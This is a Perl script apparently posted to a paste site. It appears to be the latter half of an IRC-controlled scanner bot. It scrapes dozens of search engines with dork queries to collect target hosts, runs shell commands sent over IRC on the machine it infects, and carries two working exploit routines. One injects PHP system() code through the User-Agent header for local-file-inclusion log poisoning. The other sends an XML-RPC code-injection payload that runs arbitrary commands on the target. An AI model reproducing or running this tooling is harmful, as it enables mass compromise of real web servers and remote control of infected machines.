- if ($1 !~ /uol\.com/) {
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub bing() {
- my @list;
- my $key = $_[0];
- for (my $i=1; $i<=500; $i+=10) {
- my $search = ("http://www.bing.com/search?q=".&key($key)."&filt=all&first=".$i."&FORM=PERE");
- my $res = &search_engine_query($search);
- if ($res =~ m/Ref A:/g && $res =~ m/Ref B:/g && $res =~ m/Ref C:/g) {$i=500;}
- while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
- if ($1 !~ /bing\.com/) {
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub altavista() {
- my @list;
- my $key = $_[0];
- for (my $i=1; $i<=500; $i+=10){
- my $search = ("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".&key($key)."&stq=".$i);
- my $res = &search_engine_query($search);
- if ($res !~ /target=\"_self\">Succ/) {$i=500;}
- while ($res =~ m/<span class=ngrn>(.+?)\//g) {
- if ($1 !~ /altavista/){
- my $link = $1;
- $link =~ s/<//g;
- $link =~ s/ //g;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub ask() {
- my @list;
- my $key = $_[0];
- for (my $i=1; $i<=50; $i+=1) {
- my $search = ("http://it.ask.com/web?q=".&key($key)."&qsrc=0&o=0&l=dir&qid=EE90DE6E8F5370F363A63EC61228D4FE&page=".$i."&jss=1&dm=all");
- my $res = &search_engine_query($search);
- if ($res !~ /Successiva/) {$i=50;}
- while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=\"/g) {
- if ($1 !~ /ask\.com/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub yahoo(){
- my @list;
- my $key = $_[0];
- my $b = 0;
- for ($b=1; $b<=500; $b+=10) {
- my $search = ("http://search.yahoo.com/search?p=".&key($key)."&b=".$b);
- my $res = &search_engine_query($search);
- while ($res =~ m/http\%3a\/\/(.+?)\"/g) {
- if ($1 !~ /yahoo\.com/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub clusty() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- for ($b=10; $b<=500; $b+=10) {
- my $search = ("http://search.yippy.com/search?query=".&key($key)."&input-form=clusty-simple&v:sources=webplus&v:state=root|root-".$b."-10|0&");
- my $res = &search_engine_query($search);
- if ($res !~ /next/) {$b=500;}
- while ($res =~ m/<div class=\"document-header\"><a href=\"http:\/\/(.*?)\"><span class=\"title\">/g) {
- if ($1 !~ /yippy\.com/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub gutser() {
- my @list;
- my $key = $_[0];
- for ($b=1; $b<=50; $b+=1) {
- my $search = ("http://www.goodsearch.com/Search.aspx?Keywords=".&key($key)."&page=".$b."&osmax=0");
- my $res = &search_engine_query($search);
- while ($res =~ m/http:\/\/([^>\"]*)\">/g) {
- if ($1 !~ /goodsearch|good\.is|w3\.org|quantserve/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub google2() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- my @doms = ("ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","com.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn","hr","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms","com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","pt","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug","co.uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","co.zm");
- foreach my $domain (@doms) { $dom = $doms[rand(scalar(@doms))];
- for ($b=1; $b<=200; $b+=10) {
- my $search = ("http://www.google.".$dom."/search?num=50&q=".&key($key)."&start=".$b."&sa=N");
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
- if ($1 !~ /google/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- } return @list;
- }
- }
- sub exalead() {
- my @list;
- my $key = $_[0];
- for ($b=0; $b<=1000; $b+=100) {
- my $search = ("http://www.exalead.com/search/web/results/?q=".&key($key)."&elements_per_page=100&start_index=".$b);
- my $res = &search_engine_query($search);
- if ($res =~ m/<span id=\"topNextUrl\">/g) {$b=1000;}
- while ($res =~ m/<a class=\"thumbnail\" href=\"http:\/\/(.*?)\"/g) {
- my $link = $1;
- if ($link!~ /exalead/){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub lycos() {
- my @list;
- my $key = $_[0];
- for ($b=0; $b<=50; $b+=1) {
- my $search = ("http://search.lycos.com/?query=".&key($key)."&page2=".$b."&tab=web&searchArea=web&diktfc=468007302EF7DB9AFE53D4138B848E7B4000D424385F");
- my $res = &search_engine_query($search);
- while ($res =~ m/href=\"http:\/\/(.+?)\" onmouseover=/g) {
- if ($1 !~ /lycos\.com/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub virgilio() {
- my @list;
- my $key = $_[0];
- for ($b=10; $b<=500; $b+=10) {
- my $search = ("http://ricerca.virgilio.it/ricerca?qs=".&key($key)."&filter=1&site=&lr=&hits=10&offset=".$b);
- my $res = &search_engine_query($search);
- if ($res =~ m/non ha prodotto risultati/i) {$b=500;}
- if ($res =~ m/riconducibile a richieste effettuate/i) {$b=500;}
- while ($res =~ m/<a href=\"http:\/\/(.+?)\" target=\"/g) {
- if ($1 !~ /\.virgilio\.it/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub webde() {
- my @list;
- my $key = $_[0];
- for ($b=1; $b<=50; $b+=1) {
- my $search = ("http://suche.web.de/search/web/?pageIndex=".$b."&su=".&key($key)."&search=Suche&webRb=countryDE");
- my $res = &search_engine_query($search);
- if ($res =~ m/Suchbegriff nicht gefunden/i) {$b=50;}
- while ($res =~ m/<span class=\"url\">http:\/\/(.*?)<\/span>/g) {
- my $link = $1;
- if ($link!~ /suche|web/){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub hotbot() {
- my @list;
- my $key = $_[0];
- for ($b=0; $b<=50; $b+=1) {
- my $search = ("http://www.hotbot.com/?query=".&key($key)."&ps=&loc=searchbox&tab=web&mode=search&currProv=msn&page=".$b."&diktfc=51964BFDE35DFB6914F9E1E0D7988C3AC0ACB52B58BE");
- my $res = &search_engine_query($search);
- if ($res =~ m/had no web result/i) {$b=50;}
- while ($res =~ m/rel=\"nofollow\" href=\"http:\/\/(.+?)\"/g) {
- if ($1 !~ /hotbot\.com/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub aol() {
- my @list;
- my $key = $_[0];
- for ($b=2; $b<=50; $b+=1) {
- my $search = ("http://aim.search.aol.com/aol/search?q=".&key($key)."&page=".$b);
- my $res = &search_engine_query($search);
- while ($res =~ m/href=\"http:\/\/(.*?)\" property/g) {
- if ($1 !~ /aol\.com/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub sapo(){
- my @list;
- my $key = $_[0];
- for ($b=1; $b<=50; $b+=1) {
- my $search = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".$b."&q=".&key($key)."&st=local");
- my $res = &search_engine_query($search);
- if ($res !~ m/Next/i) {$b=50;}
- while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
- if ($1 !~ /\.sapo\.pt/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub duck() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- for ($b=1; $b<=50; $b+=1) {
- my $search = ("http://duckduckgo.com/html/?q=".&key($key)."&t=A&l=en&p=1&s=".$b."&o=json&dc=".$b."&api=d.js");
- my $res = &search_engine_query($search);
- if ($res =~ m/No more results/i) {$b=50;}
- while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
- if ($1 !~ /duckduckgo/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub lygo() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- for ($b=0; $b<=50; $b+=1) {
- my $search = ("http://www.hotbot.com/?query=".&key($key)."&ps=&loc=searchbox&tab=web&mode=search&currProv=lygo&page2=".$b."&diktfc=51964BFDE35DFB6914F9E1E0D7988C3AC0ACB52B58BE");
- my $res = &search_engine_query($search);
- if ($res =~ m/had no web result/i) {$b=50;}
- while ($res =~ m/<a href=\"http:\/\/(.+?)\"><img/g) {
- if ($1 !~ /hotbot\.com/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub yause() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- for ($b=1; $b<=50; $b+=1) {
- my $search = ("http://www.yauba.com/?query=".&key($key)."&where=websites&target=websites&con=y&ilang=english&clt=topic&pg=".$b);
- my $res = &search_engine_query($search);
- if ($res !~ m/Next/i) {$b=50;}
- while ($res =~ m/<h1><a rel=\"nofollow\" href=\"http:\/\/(.+?)\" onfocus=/g) {
- if ($1 !~ /yauba\.com/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub baidu() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- for ($b=0; $b<=500; $b+=10) {
- my $search = ("http://www.baidu.com/s?wd=".&key($key)."&pn=".$b);
- my $res = &search_engine_query($search);
- while ($res =~ m/\" href=\"http:\/\/(.*?)\" target=/g) {
- if ($1 !~ /baidu\.com/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub kipot() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- for ($b=1; $b<=50; $b+=1) {
- my $search = ("http://www.qkport.com/".$b."/web/".&key($key));
- my $res = &search_engine_query($search);
- while ($res =~ m/href=\"http:\/\/(.*?)\" target=\"_top\"/g) {
- if ($1 !~ /qkport\.com/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub gibla() { #mati#
- my @list;
- my $key = $_[0];
- my $hal = "/search?q=".&key($key);
- my $search = ("http://www.gigablast.com".$hal);
- my $res = &search_engine_query($search);
- while ($res =~ m/Next 10 Results/) {
- $search = ("http://www.gigablast.com".$hal);
- while ($res =~ m/<span class=\"url\">(.+?)><\/span>/g) {
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- if ($res =~ m/<center><a href=\"(.*?)\">/) { $hal = $1; }
- $res = &search_engine_query($search);
- }return @list;
- }
- sub black() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- for ($b=0; $b<=50; $b+=1) {
- my $search = ("http://blekko.com/ws/".&key($key)."?ft=&p=".$b);
- my $cek = $b+1;
- my $res = &search_engine_query($search);
- if ($res !~ m/<strong>$b<\/strong>/i) {$b=50;}
- while ($res =~ m/class=\"UrlTitleLine\" href=\"http:\/\/(.+?)\"/g) {
- if ($1 !~ /blekko/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub onet() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- for ($b=1; $b<=50; $b+=1) {
- my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".&key($key));
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
- if ($1 !~ /webcache|query/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub sizuka() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- for ($b=10; $b<=100; $b+=10) {
- my $search = ("http://www.szukacz.pl/szukaj.aspx?ct=polska&pc=polska&q=".&key($key)."&start=".$b);
- my $res = &search_engine_query($search);
- while ($res =~ m/<a title=\"http:\/\/(.+?)\"/g) {
- if ($1 !~ /szukacz/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub walla() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- for ($b=0; $b<=50; $b+=1) {
- my $search = ("http://search.walla.co.il/?t=0&e=utf&q=".&key($key)."&p=".$b);
- my $res = &search_engine_query($search);
- while ($res =~ m/<td class=sw><a href=\"http:\/\/(.+?)\"/g) {
- if ($1 !~ /walla\.co\.il/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub demos() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- for ($b=0; $b<=500; $b+=10) {
- my $search = ("http://search.dmoz.org/search/search?q=".&key($key)."&start=".$b."&type=next&all=yes");
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
- if ($1 !~ /search|dmoz/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub rose() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- my @langs = ("de","nl","fi","ps","da","en","es","fr","it","no","sv","cs","pl","ru");
- foreach my $language (@langs) { $lang = $langs[rand(scalar(@langs))];
- for ($b=0; $b<=30; $b+=10) {
- my $search = ("http://euroseek.com/system/search.cgi?language=".$lang."&mode=internet&start=".$b."&string=".&key($key));
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"http:\/\/(.+?)\" class=/g) {
- if ($1 !~ /euroseek/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- }return @list;
- }
- sub seznam() {
- my @list;
- my $key = $_[0];
- for ($b=1; $b<=500; $b+=10) {
- my $search = ("http://search.seznam.cz/?q=".&key($key)."&count=10&pId=SkYLl2GXwV0CZZUQcglt&from=".$b);
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"http:\/\/(.+?)\" title/g) {
- if ($1 !~ /seznam/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub tiscali() {
- my @list;
- my $key = $_[0];
- for ($b=0; $b<=500; $b+=10) {
- my $search = ("http://search.tiscali.it/?tiscalitype=web&collection=web&start=".$b."&q=".&key($key));
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"http:\/\/(.+?)\" onclick/g) {
- if ($1 !~ /tiscali/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub naver() {
- my @list;
- my $key = $_[0];
- for ($b=1; $b<=500; $b+=10) {
- my $search = ("http://web.search.naver.com/search.naver?where=webkr&query=".&key($key)."&docid=0〈=all&f=&srcharea=all&st=s&fd=2&start=".$b."&display=10");
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
- if ($1 !~ /naver/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- #########################################
- sub clean() {
- my @cln = ();
- my %visit = ();
- foreach my $element (@_) {
- $element =~ s/\/+/\//g;
- next if $visit{$element}++;
- push @cln, $element;
- }
- return @cln;
- }
- sub key() {
- my $dork = $_[0];
- $dork =~ s/ /\+/g;
- $dork =~ s/:/\%3A/g;
- $dork =~ s/\//\%2F/g;
- $dork =~ s/\?/\%3F/g;
- $dork =~ s/&/\%26/g;
- $dork =~ s/\"/\%22/g;
- $dork =~ s/,/\%2C/g;
- $dork =~ s/\\/\%5C/g;
- $dork =~ s/@/\%40/g;
- $dork =~ s/\[/\%5B/g;
- $dork =~ s/\]/\%5D/g;
- $dork =~ s/\?/\%3F/g;
- $dork =~ s/\=/\%3D/g;
- $dork =~ s/\|/\%7C/g;
- return $dork;
- }
- sub links() {
- my @list;
- my $link = $_[0];
- my $host = $_[0];
- my $hdir = $_[0];
- $hdir =~ s/(.*)\/[^\/]*$/$1/;
- $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
- $host .= "/";
- $link .= "/";
- $hdir .= "/";
- $host =~ s/\/\//\//g;
- $hdir =~ s/\/\//\//g;
- $link =~ s/\/\//\//g;
- push(@list,$link,$host,$hdir);
- return @list;
- }
- sub search_engine_query($) {
- my $url = $_[0];
- $url =~ s/http:\/\///;
- my $host = $url;
- my $query = $url;
- my $page = "";
- $host =~ s/href=\"?http:\/\///;
- $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
- $query =~ s/$host//;
- if ($query eq "") { $query = "/"; }
- eval {
- my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
- print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n";
- my @pages = <$sock>;
- $page = "@pages";
- close($sock);
- };
- return $page;
- }
- #########################################
- sub shell() {
- my $path = $_[0];
- my $cmd = $_[1];
- if ($cmd =~ /cd (.*)/) {
- chdir("$1") || &msg("$path","4,1No such file or directory");
- return;
- }
- elsif ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- my @output = `$cmd 2>&1 3>&1`;
- my $c = 0;
- foreach my $output (@output) {
- $c++;
- chop $output;
- &msg("$path","$output");
- if ($c == 5) { $c = 0; sleep 2; }
- }
- exit;
- }}
- }
- sub isAdmin() {
- my $status = 0;
- my $nick = $_[0];
- if ($nick eq $admin) { $status = 1; }
- return $status;
- }
- sub msg() {
- return unless $#_ == 1;
- sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
- }
- sub nick() {
- return unless $#_ == 0;
- sendraw("NICK $_[0]");
- }
- sub notice() {
- return unless $#_ == 1;
- sendraw("NOTICE $_[0] :$_[1]");
- }
- sub cmdlfi() {
- my $browser = LWP::UserAgent->new;
- my $url = $_[0];
- my $cmd = $_[1];
- my $chan = $_[2];
- my $hie = "j13mbut<?system(\"$cmd 2> /dev/stdout\"); ?>j13mbut";
- $browser->agent("$hie");
- $browser->timeout(7);
- $response = $browser->get( $url );
- if ($response->content =~ /j13mbut(.*)j13mbut/s) {
- &msg("$chan","15,1(4@9CMDLFI15)9 $1");
- } else {
- &msg("$chan","15,1(4@9CMDLFI15)4 No Output");
- }
- }
- sub cmdxml() {
- my $jed = $_[0];
- my $dwa = $_[1];
- my $chan = $_[2];
- my $userAgent = LWP::UserAgent->new(agent => 'perl post');
- $exploit = "<?xml version=\"1.0\"?><methodCall>";
- $exploit .= "<methodName>test.method</methodName>";
- $exploit .= "<params><param><value><name>',''));";
- $exploit .= "echo'bamby';system('".$dwa."');echo'solo';exit;/*</name></value></param></params></methodCall>";
- my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit);
- if ($response->content =~ /bamby(.*)solo/s) {
- &msg("$chan","15,1(4@9CMDXML15)9 $1");
- } else {
- &msg("$chan","15,1(4@9CMDXML15)4 No Output");
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement